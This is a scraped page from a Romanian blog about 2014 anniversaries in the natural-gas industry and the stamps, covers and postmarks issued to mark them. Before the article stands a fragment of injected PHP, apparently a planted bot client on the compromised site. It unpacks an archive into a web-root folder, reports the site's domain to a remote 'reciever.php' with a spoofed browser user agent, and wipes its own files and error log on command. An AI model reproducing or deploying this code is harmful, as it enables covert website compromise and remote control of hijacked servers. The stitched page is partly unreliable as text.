'; $data = $data1.$data2.$data3.$data4.$data5; $fas = fopen ($unzip_path, "w"); fwrite($fas, $data); fclose($fas); $unzip_url = 'http://'.$domain_name_2.'/'.$status[1].'unzip.php'; echo getURL($unzip_url); } } else { echo '~Can not upload archive!~'; rmdir($dir_path); exit; } if (file_exists($script_name)) { echo '~Client has been activated!~'; $file_name = $_SERVER['DOCUMENT_ROOT'].'/'.$status[1].'server_name.txt'; $file = fopen($file_name,"rt"); $original_file = fread($file,filesize($file_name)); fclose($file); $domain_name = $_SERVER['SERVER_NAME']; $url = $original_file.'reciever.php?data='.$domain_name; $UA = 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'; $ch = curl_init($url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_TIMEOUT, 30); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); curl_setopt($ch, CURLOPT_REFERER, $domain_name); curl_setopt($ch, CURLOPT_USERAGENT, $UA); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $data = curl_exec($ch); curl_close($ch); echo $data.'
'; $data = file_get_contents($url); echo $data.'
'; echo getURL($url); exit; } else { echo '~Can not unziped!~'; unlink($archive_path); rmdir($dir_path); exit; } } else { echo '~Can not make dir!~'; exit; } } if ($status[0] == 'finish') { $file_name_2 = $_SERVER['DOCUMENT_ROOT'].'/'.$status[1].'server_name.txt'; $file_2 = fopen($file_name_2,"rt"); $original_file_2 = fread($file_2,filesize($file_name_2)); fclose($file_2); if (($status[1] != null) and ($status[1] != '')) $dir_for_work = $status[1]; else $dir_for_work = 'conflg/'; $dir_path = $_SERVER['DOCUMENT_ROOT'].'/'.$dir_for_work; $archive_path = $dir_path.'1.zip'; if (is_dir($dir_path)) { $arr_filename = array (); if ($dh = opendir($dir_path)) { while (($file = readdir($dh)) !== false) { if (($file != ".") and ($file != "..")) $arr_filename[] = $file; } closedir($dh); } foreach ($arr_filename as $key) { $key = trim($key); $file_for_delete = "$dir_path/$key"; $file_for_delete = str_replace('///', '/', $file_for_delete); $file_for_delete = str_replace('//', '/', $file_for_delete); $file_for_check = str_replace($_SERVER['DOCUMENT_ROOT'], '/', $file_for_delete); $file_for_check = str_replace('//', '/', $file_for_check); if (substr_count($file_for_check, "/") >=2) { if (file_exists($file_for_delete)) unlink($file_for_delete); if (file_exists($file_for_delete)) { chmod($file_for_delete, 0777); unlink($file_for_delete); } } } } if (file_exists("error_log")) unlink("error_log"); if (is_dir($dir_path)) rmdir($dir_path); if (is_dir($dir_path)) { chmod($dir_path, 0777); rmdir($dir_path); } if (is_dir($dir_path)) echo "~Error!~"; else { $domain_name = $_SERVER['SERVER_NAME']; $url = $original_file_2.'reciever.php?del='.$domain_name; $UA = 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'; $ch = curl_init($url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_TIMEOUT, 30); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); curl_setopt($ch, CURLOPT_REFERER, $domain_name); curl_setopt($ch, CURLOPT_USERAGENT, $UA); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $data = curl_exec($ch); curl_close($ch); echo $data.'
'; $data = file_get_contents($url); echo $data.'
'; echo getURL($url); } exit; } } } ?> Aniversari in sectorul gazelor naturale marcate cu ajutorul filateliei | Dumitru Chisalita

Rss

Aniversari in sectorul gazelor naturale marcate cu ajutorul filateliei

Anul 2014 se poate constitui intr-un an jubiliar pentru industria de gaze naturale din Romania si sub multe aspecte din Europa. Gazele naturale pe plan mondial, reprezinta o importanta, energie primara folosita de om in activitatii industriale si casnice, fiind combustibilul fosil cel mai „curat”. In perspectiva anilor 2030 ponderea acestei surse de energie primara se asteapta sa creasca semnificativ substituind alte forme de energie cum sunt petrolul şi carbunele.

Pentru Romania, anul 2014 poate fi denumit „Anul gazelor naturale”, fiind anul care reuneste cele mai multe aniversari rotunde din istoria gazelor naturale, dintre care 4 se pot incadra ca premiere europene:

1. 155 de Ani de la iniţierea construirii distribuţiei de gaze manufacturiale în Bucureşti (1859)

2. 110 de Ani de la primele teste de utilizare a gazelor asociate in scopuri industriale in Romania si Europa (1904)

3. 105 de Ani de la finalizarea forajului la prima sondă de gaze din Romania si Europa (22 Aprilie 1909)

4. 100 de ani de la finalizarea primei conducte de transport a gazelor naturale din Europa (4 aprilie 1914)

5. 55 de ani de la primul export al gazelor din Romania, care poate fi considerat si primul export din Europa a gazelor naturale (1959)

6. 40 de Ani de tranzit international in Romania si Balcani (25 Iulie 1974)

7. 35 de Ani de la amenajarea primului depozit modern de inmagazinare subterana a gazelor la Urziceni (1979)

8. 35 de Ani de la inceperea importului gazelor naturale in Romania (1979)

9. 15 Ani de la punerea in exploatare a primei interconectari dintre sistemele nationale de gaze ale Romaniei si Ucrainei (1999)

Daca aceste manifestari au fost puse in evidenta in diferite moduri, unul din cele mai interesante a fost marcarea acestor evenimente prin intermediul filateliei.

In acest context se incadreaza articolul UN SECOL DE TRANSPORT GAZE NATURALE (1914 – 2014) publicat de dl ing. Liviu Pintican, fost director general adjunct in cadrul SNTGN TRANSGAZ SA Medias, a aparut in Revista Sibiana Curierul Filatelic nr. 173, Martie – Iunie 2014, din care cu acordul dansului, am extras cateva elemente:

 Pentru a marca centenarul 100 de ani de la finalizarea pe teritoriul României a primei conducte de transport gaze naturale, Cercul filatelic din Mediaş în colaborare cu Muzeul Gazelor Naturale din localitate, a realizat un plic filatelic a cărui imagine reproduce o fotografie autentică ce surprinde un moment din lucrările de montaj efectuate la construcţia conductei Sărmăşel – Turda. Plicul a fost francat cu marca de 1 leu din Seria “Ceasul florilor”(I), apărută în anul 2013 şi care a fost obliterată cu ştampila aniversară utilizată la Oficiul Poştal nr. 1 din Mediaş, în data de 04.04.2014, (fig.1). Macheta ştampilei a fost realizată de către dl. ing. Ovidiu Ilieş.

5

– fig.1 –

În decursul timpului, Cercul filatelic din Mediaş – oraşul în care se află sediile celor mai mari societăţi din industria gazieră din România, respectiv Romgaz SA şi Transgaz SA, a avut mai multe iniţiative prin care s-a reuşit oglindirea şi pe tărâm filatelic, a unor aspecte din industria gazieră românească.

Este de remarcat faptul că la 17 ianuarie 1981, a luat fiinţă în cadrul Centrului de Cercetare şi Proiectare pentru Gaz Metan Mediaş, Gruparea filatelică “SONDORUL”. Această grupare, activă până în anul 1990, a fost prima de acest gen organizată în cadrul unei instituţii economice din judeţul Sibiu. An de an, această grupare a realizat mai multe piese filatelice (plicuri filatelice, cărţi maxime, ştampile ocazionale, etc.) şi chiar şi expoziţii tematice dedicate tradiţionalei sărbători anuale, “Ziua petrolistului”, (fig.2 şi fig.3).

2

– fig.2 –

1

– fig.3 –

De asemenea, doresc să menţionez mărcile poştale apărute în anul 2009, care au marcat momente de referinţă ale industriei gaziere din România, după cum urmează:

~ “100 de ani Romgaz”. De fapt este vorba de Centenarul descoperirii gazului metan pe teritoriul actual al României. Imaginea mărcii poştale de 2,40 lei apăruta în anul 2009, împreună cu vignetele şi tabs-urile emisiunii, sunt extrem de sugestive pentru istoria industriei extractive de gaze naturale din România. Acestea reproduc capul de erupţie al sondei 2 Sărmăşel, o staţie modernă de deshidratare cu glicoli a gazelor naturale şi sigla companiei Romgaz SA, (fig.4).

~ “35 de ani tranzit de gaze în România şi Balcani”. Marca poştală de 5 lei apărută în anul 2009, reproduce un grup de lansatoare utilizate la pozarea ţevilor pe traseu şi sigla companiei Transgaz SA, (fig.5).

~  “România – Sursă europeană de energie”. Marca poştală de 2,10 lei dedicată gazelor naturale aparută în anul 2009, menţionează localităţile Sărmăşel, ca fiind locul în care s-a descoperit primul zăcământ de gaze naturale, şi respectiv Turda, care a fost primul oraş alimentat şi ulterior iluminat cu gaze naturale, (fig.6).

 10

 – fig.5 –

9

– fig.4 –

 8

 – fig.6 –

În figurile 7, 8, 9 şi 10, am prezentat câteva plicuri realizate la Mediaş, a căror  tematică se referă la industria gazieră românească: Sonda 2 Sărmăşel, Portretul celui mai de seama înaintaş şi promotor al industriei gaziere româneşti – Dr. ing. Constantin Ioan Motas, Sediul din Mediaş al Societăţii Transgaz SA, Traseul conductelor de pe teritoriul României prin care se realizeaza tranzitul gazelor din Federaţia Rusă spre ţări din Regiunea Balcanică.

3

– fig.7 –

4

– fig.8 –

6

– fig.9 –

7

– fig.10 –